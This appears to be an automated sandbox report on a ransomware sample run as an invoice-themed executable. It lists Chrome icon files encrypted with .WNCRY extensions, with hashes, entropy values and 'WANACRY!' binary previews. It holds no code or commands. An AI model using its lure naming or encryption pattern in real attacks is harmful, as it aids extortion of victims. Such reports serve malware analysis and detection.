                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5480
                                                          Entropy (8bit):7.969839016170105
                                                          Encrypted:false
                                                          SSDEEP:96:oZiV57mA9LLVJtzLNpaom1og59i3jpZeeSGx6MJPH72x7fL51POv13+BVwOrvRNA:si/mA9LZnHat6tTSG8M9Y7fTOvEBVwOI
                                                          MD5:A4BB551A4B91BC7FF553D103DDE8392F
                                                          SHA1:04876A77099A254026E4750917544A93AF745B52
                                                          SHA-256:C49C315FCDB9FF2CC8A1CC93C7751AB78E28F92449A44038488B15A853FCE0F9
                                                          SHA-512:6F0075F554CDF8D4D2276C88CF7B1A222EAEE04F5F672FDF9856E1466F43144D7324BBF6632E4240908316114E536E4926B47C7FE6A003518A543DE230922338
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......iYN.s.].(...lX.......9C..U.?.>.......*......IZ.d_.E!.v....G.4...z...?_..N.GO,..3y-X.....U.._.=..X.i....).@o...p)=wv.4.Uli..e2y..o....(..tc.n(.c\.Ud...&.>.l!B..+....3..K.5p.-dV....o....LC.u..=..x}....\O%E.i12..I.x...n.Wk..[. .\.[3#>.,.9.....G.........h..[....a^ns..{M...|X.*....eAc!..U.}l.-X..Gw:.N.......=...2|.D..v.....@.?...O.HB.IlvQa..K"=.....U..ou.#9........6.|.4....W.]...|.'"~.#..,?.z..Q$..5d!...,K0...l.3...G..x.V......:.\.:.n(..L.v%92D....&.6....Y...qV.4_...........q.N.:-.OC..y..{.GC....PP....(.......6..Uf.....b.pu...OY..c..]........z..._....8..S.#q./.m`.I^.........+..aZ.E.C.)...t.*..^.......N.W.k...5..;bFob.e|.......d;.4A.L=..X$.-..6.u4.B.G...95..w.c.F.....VMV...p~.}.QA.q..%E`.c.....M1."K....^..] .Ca~.%.....f,...Z^w.r$Y...*.%...3c."...S.......La.C...._z........._...../"...On9O.>..4#.[......f.Q.:1..;...f.L.r...L.t..h..U.I......=./.g8d_+..0..5..8QCw.6..n.Z.H..o1Xk.....Ls.8....=O...0.._.X.'...p..+..XB.`.>P%.z.,g.....

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\32.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.843138110116323
                                                          Encrypted:false
                                                          SSDEEP:24:bkG+PxQwyuqmyt6qzpMkOrXD44IxBslHgbLPzajRGWopo3tJqQBUEGBv:bkG+pDfk42jh3kGho3tJLqr
                                                          MD5:E6AD5CE4E4B1A2CD99354BBC8F1E6AFE
                                                          SHA1:83E2A6F26902F17610B262D53F3C08A4D6F06DE5
                                                          SHA-256:35A22E7554A6B345E49CFAA999A5ECBC6B27E0A8ED0F45E6F939EB19CD44B0A1
                                                          SHA-512:48609FAF6A747FABDD18EACEE7B762D93710148EE180EA2945D935E47DDE0BA1D6CBF2E98DF45338769194C179D1E627B37D257BEB32FC9AA79E0DEED12AB55B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......C.&.S....}_..5.B.*S.+...4.q.f...$.{8lj>...3..2..>.^.F#7r.....%.....n.Q.....A..Gq......|q....[.. ...r..w...w~4<}.38....g..;,W..........o..l.'....-3......flt.4*.R4..X..]O.n.e....vk$...}...8..1....&.K5z?s-Q.........L.........&0f.UdL..!={`..9..._................o..O/jqT.(..KF......EQ =...=t....o.c...*M=.e.2.{.`...+eM#..C.A...|.f.psb?5.......W..+n..d......l.......*7.?D....=Rl]..@.......@d7k.-0o.+.?....+f..5..'.C...".4...8..91..GX'..)S../...N..#....L.d8....6o....k..@n3..O..W[.Y.!...w.'.f..8@.t.u..W... H........bB.<d@._d.....'.<Wv]S......3A.P..p....-....#;..My...}.2..../......^:........J\..../..P"J.K@../..b....73.PonN..e%........}.v>rJc.....OagcR!....&....aH.../.y....H..zd..ud.D.....5n...d.{.f':.P.m..E.0.....*.gEY..{.9s&@H.b=..M.X...<..._P.e8`.U.u...%....?K..c......-.];..".:..."..;+Y.4.......S@.[......!..W.z....@2E.{.03. ..@'....5]..b]...Q..oV..6.>...2"..7.......`.........>JG.N;C@......Z.7f.IX:z.>N.p..{^...o..j

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\32.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.843138110116323
                                                          Encrypted:false
                                                          SSDEEP:24:bkG+PxQwyuqmyt6qzpMkOrXD44IxBslHgbLPzajRGWopo3tJqQBUEGBv:bkG+pDfk42jh3kGho3tJLqr
                                                          MD5:E6AD5CE4E4B1A2CD99354BBC8F1E6AFE
                                                          SHA1:83E2A6F26902F17610B262D53F3C08A4D6F06DE5
                                                          SHA-256:35A22E7554A6B345E49CFAA999A5ECBC6B27E0A8ED0F45E6F939EB19CD44B0A1
                                                          SHA-512:48609FAF6A747FABDD18EACEE7B762D93710148EE180EA2945D935E47DDE0BA1D6CBF2E98DF45338769194C179D1E627B37D257BEB32FC9AA79E0DEED12AB55B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......C.&.S....}_..5.B.*S.+...4.q.f...$.{8lj>...3..2..>.^.F#7r.....%.....n.Q.....A..Gq......|q....[.. ...r..w...w~4<}.38....g..;,W..........o..l.'....-3......flt.4*.R4..X..]O.n.e....vk$...}...8..1....&.K5z?s-Q.........L.........&0f.UdL..!={`..9..._................o..O/jqT.(..KF......EQ =...=t....o.c...*M=.e.2.{.`...+eM#..C.A...|.f.psb?5.......W..+n..d......l.......*7.?D....=Rl]..@.......@d7k.-0o.+.?....+f..5..'.C...".4...8..91..GX'..)S../...N..#....L.d8....6o....k..@n3..O..W[.Y.!...w.'.f..8@.t.u..W... H........bB.<d@._d.....'.<Wv]S......3A.P..p....-....#;..My...}.2..../......^:........J\..../..P"J.K@../..b....73.PonN..e%........}.v>rJc.....OagcR!....&....aH.../.y....H..zd..ud.D.....5n...d.{.f':.P.m..E.0.....*.gEY..{.9s&@H.b=..M.X...<..._P.e8`.U.u...%....?K..c......-.];..".:..."..;+Y.4.......S@.[......!..W.z....@2E.{.03. ..@'....5]..b]...Q..oV..6.>...2"..7.......`.........>JG.N;C@......Z.7f.IX:z.>N.p..{^...o..j

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\48.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1656
                                                          Entropy (8bit):7.888374146353715
                                                          Encrypted:false
                                                          SSDEEP:48:bkmwfYn1QnZ2oCVkEbRoPs/vWf9V1zpM0L:o+n1Q8V7bU8v+VtW2
                                                          MD5:F84FD9EB1699D67ACDB14EDA66B04474
                                                          SHA1:BA6DF842EEBBE7C29E2355A8102293F728ED1BCE
                                                          SHA-256:BD8CBA01B50C337C0F2E5F19FA0C69DCDC5F38717DF77BC91B71D25DD9EAC8B6
                                                          SHA-512:D07F52CCA5010917E3734999DFD2C5B2E09F9C9C231FBB7D02DCB9341CAF8853E91293B525A81FEFB30724959B21A91A07345DA0CD2968E2609E6CFEFF363049
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....r.....cY.R...m..Uq...|..6.N`...}[.........V..*....v.1....A;..#...{....)....tr.)..W..tq.....X.HE....D./..!.qTQ...NY.If`/...U..D2w.9.5.N.`....[....%....2r:].`...xv......8J.:.-p....+...".O.ab.W..........r$..9..............':......t..p...#.tRp(.a0....Y.......J.e...r.....Q....j.....o3/.Y.w.....B.U&Bq.............y(/].ajA86j8<..k....a...@1.`.N-?.ls.#2gM.../..J.r}D7m.$p..."..qs8..m.`.8as...Y.B.U.cg..^g[.>........e.2h9bY7c.zyq^Z..$.hEvu|.q....J}Z..!Y.<M..1."!w..KM.-....d.<b..Q..<.}.#...,.q.V.V..0..%ozF..,...:...;#.G..1.....J.+^dw......&.Sv..@...?[@oL./.a.~....t#.7...E4.d....\0.+3#..QYM&.n.x..H2.).cH....5..6....i.Q..dn..>6.T.).xr.n3j..9]1.4z!)....O.6G......F39..k..sD....n.CO.-}.0.Z.Pq..7{f(...q.O.N.....'......JT'.3F.Y...Y...N~.....^N...3...\,.5-..._..$......s.x..e....Z.K. +X00.N....k....0X..E...2..........O.z4...Z......l^...d_j........{..m........Q.oL-.P.B..U..M....&..........A.....:b%.q..3..S=...Zm,W..!.CJ.......p

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\48.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1656
                                                          Entropy (8bit):7.888374146353715
                                                          Encrypted:false
                                                          SSDEEP:48:bkmwfYn1QnZ2oCVkEbRoPs/vWf9V1zpM0L:o+n1Q8V7bU8v+VtW2
                                                          MD5:F84FD9EB1699D67ACDB14EDA66B04474
                                                          SHA1:BA6DF842EEBBE7C29E2355A8102293F728ED1BCE
                                                          SHA-256:BD8CBA01B50C337C0F2E5F19FA0C69DCDC5F38717DF77BC91B71D25DD9EAC8B6
                                                          SHA-512:D07F52CCA5010917E3734999DFD2C5B2E09F9C9C231FBB7D02DCB9341CAF8853E91293B525A81FEFB30724959B21A91A07345DA0CD2968E2609E6CFEFF363049
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....r.....cY.R...m..Uq...|..6.N`...}[.........V..*....v.1....A;..#...{....)....tr.)..W..tq.....X.HE....D./..!.qTQ...NY.If`/...U..D2w.9.5.N.`....[....%....2r:].`...xv......8J.:.-p....+...".O.ab.W..........r$..9..............':......t..p...#.tRp(.a0....Y.......J.e...r.....Q....j.....o3/.Y.w.....B.U&Bq.............y(/].ajA86j8<..k....a...@1.`.N-?.ls.#2gM.../..J.r}D7m.$p..."..qs8..m.`.8as...Y.B.U.cg..^g[.>........e.2h9bY7c.zyq^Z..$.hEvu|.q....J}Z..!Y.<M..1."!w..KM.-....d.<b..Q..<.}.#...,.q.V.V..0..%ozF..,...:...;#.G..1.....J.+^dw......&.Sv..@...?[@oL./.a.~....t#.7...E4.d....\0.+3#..QYM&.n.x..H2.).cH....5..6....i.Q..dn..>6.T.).xr.n3j..9]1.4z!)....O.6G......F39..k..sD....n.CO.-}.0.Z.Pq..7{f(...q.O.N.....'......JT'.3F.Y...Y...N~.....^N...3...\,.5-..._..$......s.x..e....Z.K. +X00.N....k....0X..E...2..........O.z4...Z......l^...d_j........{..m........Q.oL-.P.B..U..M....&..........A.....:b%.q..3..S=...Zm,W..!.CJ.......p

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\64.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1800
                                                          Entropy (8bit):7.887912202904043
                                                          Encrypted:false
                                                          SSDEEP:48:bk+I3LfP34ApH0JYOk0O4tcLQhdrwkWBT8z4AlUNiuo80rSLt:od37PIZ+lYrRWcXumy
                                                          MD5:8B440DA66C65E1EDBF6550A3F4AA7969
                                                          SHA1:B2674A6455B1F28E10C26383E7F539EA6EFA9F5D
                                                          SHA-256:22E546D332B3DAD9175F2BCB4DEA8A14B9235FD334B194656C3D9B79A34D2D82
                                                          SHA-512:74EE7899BEF4CAE62DFF6415D595EDCB5BA80494A7D15B853D1DB6DF634FC94060B685A15D5CABF8FFBB05371D0AB391DFCC98E0BBF7FF09EE8A7DA8FB95C519
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....,....(..{.o..!@..4.L.....7....L.~G.8.....?..R ..`.cuH<..8H.}f.0..Pi..[..V....:`...y..,U..P.ug..n...(..B ..y..I2@.`L.;?bq?...h....x..D..h/*V.O..q.#y.....e...K.IX.^..D......}0.W...chs.k....Z.4..i.sA.8.a..^..... .\d.l.wm&>6...c.84.az....>]..}g.......qG...............[...w.....Yg..4.:.b.....q&...,jR:.&...`...`z..X&... .d.O.?..V.c.)!u.. #<.`._..6...f.u..9`..fU~....B.NzA.`...B.s......Yw......dE....Q.%..0.o;..o.G\H.a.....L..v....c..t..b..M.R"H....%...b.~.'.Jt.....I;c...s.E.<..R.v.../Io.$..*.Vb..e..>\p..G...HJ...u.....Pm.....\hQ...#m..0jx.@.z~ .zg...d.d.J<g.-..x&..T.g....[......[...Ae...._w....R..^eZ...~.M1Z.FxZ|..-.Yk..?...T.(t..I....x.n...O.._c.9@....d1.{..3.5..d..a.1....m|..SSB..j.T.q,t#..A=....0...X0I....v.!..Bu).C.;..*.)......J...<.8.>2K.....%o.E..{.?.....}0]C.....d-oI5`.....y...JDlc.Ec..%.\....77.|.@B.0.t..q.ojj^.l(.@g...Re..E..4m%=......M.ED..;."i[..8,.^.u)..X.Q..B..P\..qu.8D6..y.(.]1..........$....o.r.:...5..z^...{i9....$.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\64.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1800
                                                          Entropy (8bit):7.887912202904043
                                                          Encrypted:false
                                                          SSDEEP:48:bk+I3LfP34ApH0JYOk0O4tcLQhdrwkWBT8z4AlUNiuo80rSLt:od37PIZ+lYrRWcXumy
                                                          MD5:8B440DA66C65E1EDBF6550A3F4AA7969
                                                          SHA1:B2674A6455B1F28E10C26383E7F539EA6EFA9F5D
                                                          SHA-256:22E546D332B3DAD9175F2BCB4DEA8A14B9235FD334B194656C3D9B79A34D2D82
                                                          SHA-512:74EE7899BEF4CAE62DFF6415D595EDCB5BA80494A7D15B853D1DB6DF634FC94060B685A15D5CABF8FFBB05371D0AB391DFCC98E0BBF7FF09EE8A7DA8FB95C519
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....,....(..{.o..!@..4.L.....7....L.~G.8.....?..R ..`.cuH<..8H.}f.0..Pi..[..V....:`...y..,U..P.ug..n...(..B ..y..I2@.`L.;?bq?...h....x..D..h/*V.O..q.#y.....e...K.IX.^..D......}0.W...chs.k....Z.4..i.sA.8.a..^..... .\d.l.wm&>6...c.84.az....>]..}g.......qG...............[...w.....Yg..4.:.b.....q&...,jR:.&...`...`z..X&... .d.O.?..V.c.)!u.. #<.`._..6...f.u..9`..fU~....B.NzA.`...B.s......Yw......dE....Q.%..0.o;..o.G\H.a.....L..v....c..t..b..M.R"H....%...b.~.'.Jt.....I;c...s.E.<..R.v.../Io.$..*.Vb..e..>\p..G...HJ...u.....Pm.....\hQ...#m..0jx.@.z~ .zg...d.d.J<g.-..x&..T.g....[......[...Ae...._w....R..^eZ...~.M1Z.FxZ|..-.Yk..?...T.(t..I....x.n...O.._c.9@....d1.{..3.5..d..a.1....m|..SSB..j.T.q,t#..A=....0...X0I....v.!..Bu).C.;..*.)......J...<.8.>2K.....%o.E..{.?.....}0]C.....d-oI5`.....y...JDlc.Ec..%.\....77.|.@B.0.t..q.ojj^.l(.@g...Re..E..4m%=......M.ED..;."i[..8,.^.u)..X.Q..B..P\..qu.8D6..y.(.]1..........$....o.r.:...5..z^...{i9....$.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\96.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2136
                                                          Entropy (8bit):7.905389981186901
                                                          Encrypted:false
                                                          SSDEEP:48:bk3V2MT9We1rgAOeDMihedBvDG0emtu7ISorX0T4p32n1+w0UE48avdPdagj:o3V2Mhl1MA5XIdBv/twISsoW02ULFp
                                                          MD5:7705EDB3C9FA85AE81424A4F0E2A1C5A
                                                          SHA1:5871CF74FAB80F06299E511EB3EF0180ECC31855
                                                          SHA-256:B458D7AF483049F30F6732FBC1F69AB2E37D781E4EBF9283AB07F402AB7FD7C1
                                                          SHA-512:69A28B2293CFAB5487AC5D8DB8527EF4D58668ADE8AFB994D2F6EB584E1DF530D71D0FE1A35199B2F70779EADE4DAEB99686532AFE4E6B66DC80EE7311240A24
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....G..kjC.#....R`.P.-.6t...)8+.......U+y-5..(...x......X.'B..,..5.....o.i]."...|x.bH?k......d....@.d.MZ...1..2.,.-.-<@.|.....=l...........;.6.$....G...?S}.....zc...4'G^C...._.....\.."v...dt&.....7.k..5..y/&1....z.`........q.;9.T...D.,.{..Cy.g....7.......T.~...~y.....T.E..F.F..`.G..@...FjYVR.....|..Z..9Q.U1V..M....4.cH|....RC..X...q.........h.h=n...AmPL.kY.5 .>#3......).Nm.C.6.pt.'...8..d...7.;.L.S..."[.E..Jj.../.s..:{...t.K.*+N.~..."e$...(.W..R.[...IK5.<.6....QF..G..U3..+:..[.v....f........6.'...^.5.'..A./.s.q.kwt.nyZ.W..HbQWmKE.t..X..@.w...1/'()<..i.#...E..0.L:,.`....Pg.aQe...........Xi...'..Ml....-.(>..:.C./... 5...r......_.....I.5n.Gr..+...oM~N.u...h......$./'..t..1Q../.vm.u..[..)>K..,L.q1....7....,_.j1.....d.b.m.Y..S;.S...Z..Z...?..*M.........;..).{."=..3_#..V.u.....!..A&'..{.....IJ..3.W.+Ob...+....n.w.......l+&..,.Y..\...3....`...V.j.k.L+...V..2..h...X..{..J.o2..Wg... ................v.....@.........F.SU..=..E.#

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\96.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2136
                                                          Entropy (8bit):7.905389981186901
                                                          Encrypted:false
                                                          SSDEEP:48:bk3V2MT9We1rgAOeDMihedBvDG0emtu7ISorX0T4p32n1+w0UE48avdPdagj:o3V2Mhl1MA5XIdBv/twISsoW02ULFp
                                                          MD5:7705EDB3C9FA85AE81424A4F0E2A1C5A
                                                          SHA1:5871CF74FAB80F06299E511EB3EF0180ECC31855
                                                          SHA-256:B458D7AF483049F30F6732FBC1F69AB2E37D781E4EBF9283AB07F402AB7FD7C1
                                                          SHA-512:69A28B2293CFAB5487AC5D8DB8527EF4D58668ADE8AFB994D2F6EB584E1DF530D71D0FE1A35199B2F70779EADE4DAEB99686532AFE4E6B66DC80EE7311240A24
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....G..kjC.#....R`.P.-.6t...)8+.......U+y-5..(...x......X.'B..,..5.....o.i]."...|x.bH?k......d....@.d.MZ...1..2.,.-.-<@.|.....=l...........;.6.$....G...?S}.....zc...4'G^C...._.....\.."v...dt&.....7.k..5..y/&1....z.`........q.;9.T...D.,.{..Cy.g....7.......T.~...~y.....T.E..F.F..`.G..@...FjYVR.....|..Z..9Q.U1V..M....4.cH|....RC..X...q.........h.h=n...AmPL.kY.5 .>#3......).Nm.C.6.pt.'...8..d...7.;.L.S..."[.E..Jj.../.s..:{...t.K.*+N.~..."e$...(.W..R.[...IK5.<.6....QF..G..U3..+:..[.v....f........6.'...^.5.'..A./.s.q.kwt.nyZ.W..HbQWmKE.t..X..@.w...1/'()<..i.#...E..0.L:,.`....Pg.aQe...........Xi...'..Ml....-.(>..:.C./... 5...r......_.....I.5n.Gr..+...oM~N.u...h......$./'..t..1Q../.vm.u..[..)>K..,L.q1....7....,_.j1.....d.b.m.Y..S;.S...Z..Z...?..*M.........;..).{."=..3_#..V.u.....!..A&'..{.....IJ..3.W.+Ob...+....n.w.......l+&..,.Y..\...3....`...V.j.k.L+...V..2..h...X..{..J.o2..Wg... ................v.....@.........F.SU..=..E.#

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\128.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5656
                                                          Entropy (8bit):7.964050306691362
                                                          Encrypted:false
                                                          SSDEEP:96:oXm2Tv7lnQ6sjTZ+abrzEl9qM2C4kycWG8DFUzbxjGsuALa9CpmYGfuJIZXAfe0:2m2TjlQP7jYS5qWBRqpbu6UYGQIZQt
                                                          MD5:2BFEEA2775BEEA4BBC384772DB407ED8
                                                          SHA1:33D2569C4F1916E798FFCFFDF7DE0EFF38E0B450
                                                          SHA-256:0E73B2702C07C253CB7E186430818738AE8AD0DE44C3995CE67D1D637ED8B61F
                                                          SHA-512:B936EE2C02E88B4FE13E8513538A6D3F4E1E10FF98CF732CDC17F32AFB5B16670754C72209692E86BCBB53A8FB9FAB0B5EF41330E668C64DF86107D9D9D69DDB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....]....fk0;^..].Q..3g.S.q..JM..}.`~<.#u2.zs.c.Ql@2.q.<o}K...C..V...B.z.y...,..q..V........^.@.R..#.....u...>..E..*......PFqtP.T.}..........pG..7^.o..`...N..lh.?zE.?......=...._~*].H.LJ..s...D2.2.8.#.:...[..B.L.7.r..<^.._.JB..C.K...w.....Ar.&.*.F...b#.............6.L../..^.o/,....@....(".&X..fZ..B....$.....W%.K\....n...3..N...K.hl&y..-Z.5b..w...Qy.=..}....M.....L..u.(..G)..>..wA.^..H...~H..B....Ly+Q.D..s<...,q.....'7.f...z.%........./...........@5.0...3..TW.X.W.+U.....$E*g.....e....$...%..<.......i#.x...e.v."k...0.PF@..L......J<.0;............w.k!?......s.O........$........ .?..Sk..x7..3_....9g...U,.V~.k...k.=.v.8/.OL7.Z....S8i.Z~g.1z.`w~....l.;...2.q..E.A.\..OM..).W..\r.5..._..#....Z...X......]..2O!... .......<y...iPau......P...d.T.6..VAsj..j.P......2..c..U....}..\N..D.].6.Dbw.(.=;T.Z,g..[..q.W*......9....]..Q.a...G..(>...V..t.}.X.X0..\6...W;.>Q}]|cj.....XC.%..U3r-...Kbgy.L.....J$...|;.$......g.....?....q..).c...`.(Q...W.#...m.........c>.6h..b

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\128.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5656
                                                          Entropy (8bit):7.964050306691362
                                                          Encrypted:false
                                                          SSDEEP:96:oXm2Tv7lnQ6sjTZ+abrzEl9qM2C4kycWG8DFUzbxjGsuALa9CpmYGfuJIZXAfe0:2m2TjlQP7jYS5qWBRqpbu6UYGQIZQt
                                                          MD5:2BFEEA2775BEEA4BBC384772DB407ED8
                                                          SHA1:33D2569C4F1916E798FFCFFDF7DE0EFF38E0B450
                                                          SHA-256:0E73B2702C07C253CB7E186430818738AE8AD0DE44C3995CE67D1D637ED8B61F
                                                          SHA-512:B936EE2C02E88B4FE13E8513538A6D3F4E1E10FF98CF732CDC17F32AFB5B16670754C72209692E86BCBB53A8FB9FAB0B5EF41330E668C64DF86107D9D9D69DDB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....]....fk0;^..].Q..3g.S.q..JM..}.`~<.#u2.zs.c.Ql@2.q.<o}K...C..V...B.z.y...,..q..V........^.@.R..#.....u...>..E..*......PFqtP.T.}..........pG..7^.o..`...N..lh.?zE.?......=...._~*].H.LJ..s...D2.2.8.#.:...[..B.L.7.r..<^.._.JB..C.K...w.....Ar.&.*.F...b#.............6.L../..^.o/,....@....(".&X..fZ..B....$.....W%.K\....n...3..N...K.hl&y..-Z.5b..w...Qy.=..}....M.....L..u.(..G)..>..wA.^..H...~H..B....Ly+Q.D..s<...,q.....'7.f...z.%........./...........@5.0...3..TW.X.W.+U.....$E*g.....e....$...%..<.......i#.x...e.v."k...0.PF@..L......J<.0;............w.k!?......s.O........$........ .?..Sk..x7..3_....9g...U,.V~.k...k.=.v.8/.OL7.Z....S8i.Z~g.1z.`w~....l.;...2.q..E.A.\..OM..).W..\r.5..._..#....Z...X......]..2O!... .......<y...iPau......P...d.T.6..VAsj..j.P......2..c..U....}..\N..D.].6.Dbw.(.=;T.Z,g..[..q.W*......9....]..Q.a...G..(>...V..t.}.X.X0..\6...W;.>Q}]|cj.....XC.%..U3r-...Kbgy.L.....J$...|;.$......g.....?....q..).c...`.(Q...W.#...m.........c>.6h..b

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\192.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3208
                                                          Entropy (8bit):7.950377306879292
                                                          Encrypted:false
                                                          SSDEEP:48:bknRhlPyzsZslf0PPSPb9RjPYqzIIcR3BMiXeKwH0t7NXWY27:oRPygZs+SPbn8SIIcR3BwCRa
                                                          MD5:43778EFB4BB634DFC5917860A2DEAC30
                                                          SHA1:AD4C2AD0340A54BD637C058019D28C02A036C2B5
                                                          SHA-256:1AD1BE48A3021A914781EAE8B4DD3BDB71915973C33291BB6C8507321D377CFA
                                                          SHA-512:17800613EB766F16520E93843E8CF11968D7288B23E125EE607DEAB4A2C810EEAF73BE480132507E45C249063CB2ED0319449C40A336849A7B2D0C2307E027D9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....&*...8...P....O.p...\.\{...B;..J.....F.UQ..sY#E.^...j\Sn<.H..)H&...a!...t..n..wb.....S..5.^.4T.v.w........e..D...6..s..2......y.....dO.*L....r.z.r.Y..8.E..._^.....$yF....]].NU...7.U.I.?;N.n.=..!m.Nd...F....M.^9..K<.....|r..N...XK.&,.-.^..a....MD....g........m..V..Va./@P.e....l.|...(..DQv.......*W+.KK\GH.l.]~...uA...:{/.<U...U...f.5~....i.G.n...`......K.".........gR....1..+..........[....\.-m..@...>.Mt&&.5\w..oE'^i..oGX..s..e.B/4%...8..".Y....Ou..wD3.i(...Wo0.3`g!.........i.d.i......4.3F.]4.Z...x.k..D..2....'q...3..z7]..<....,.6........i...G.:;....gf...2em^9]..L.. .k....<.]...D.l..Em.C.P..tPV....0..y..j..p...m.l._......Q..};D....@.BxU.yJ..C....^.E....E..l..''(..Z^..0....I.,;j-j...z{p......N...=.]k......z`e.......%.QW<..=...`.B..o...#.9.j.. ..v.......Z%.I....%.fe:..*.7.g..vm...J..|..>.E_.....C....V....;.[P...P..p.w.l.wv@."..(<s...s..>.F;.d.G...{.....^....d1i...M....wc/._....%.$..o..4H....~r.dX. 2.....AG.#..OJUn".o6x1.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\192.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3208
                                                          Entropy (8bit):7.950377306879292
                                                          Encrypted:false
                                                          SSDEEP:48:bknRhlPyzsZslf0PPSPb9RjPYqzIIcR3BMiXeKwH0t7NXWY27:oRPygZs+SPbn8SIIcR3BwCRa
                                                          MD5:43778EFB4BB634DFC5917860A2DEAC30
                                                          SHA1:AD4C2AD0340A54BD637C058019D28C02A036C2B5
                                                          SHA-256:1AD1BE48A3021A914781EAE8B4DD3BDB71915973C33291BB6C8507321D377CFA
                                                          SHA-512:17800613EB766F16520E93843E8CF11968D7288B23E125EE607DEAB4A2C810EEAF73BE480132507E45C249063CB2ED0319449C40A336849A7B2D0C2307E027D9
                                                          Malicious:false
                                                          Reputation:unknown
